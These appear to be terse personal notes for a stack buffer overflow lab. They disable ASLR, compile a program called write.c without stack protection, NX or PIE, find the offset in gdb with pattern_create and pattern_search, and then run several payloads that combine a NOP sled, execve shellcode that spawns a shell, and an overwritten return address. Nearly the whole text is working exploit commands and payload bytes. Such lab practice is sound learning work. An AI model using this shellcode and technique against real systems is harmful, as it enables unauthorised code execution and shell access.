sudo sysctl -w kernel.randomize_va_space=0


compile code
gcc write.c -o write

open using gdb
gdb write

run "text to print"
run $(python3 -c 'print("a"*550)')

check different securities 
checksec

disable securities at compile time
gcc -fno-stack-protector -z execstack -no-pie write.c -o write

pattern_create 550 pat
run $(cat pat)

pattern_search

temp_shellcode = "\x90"*450+"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+"\x41"*43+"b"*6


run $(python2 -c 'print("\x90" * 459 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "\x60\xe1\xff\xff\xff\x7f" * 5)')


Latest
run $(python2 -c 'print "\x90" * 450 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "\x41" * 43 + "\x30\xe1\xff\xff\xff\x7f"')

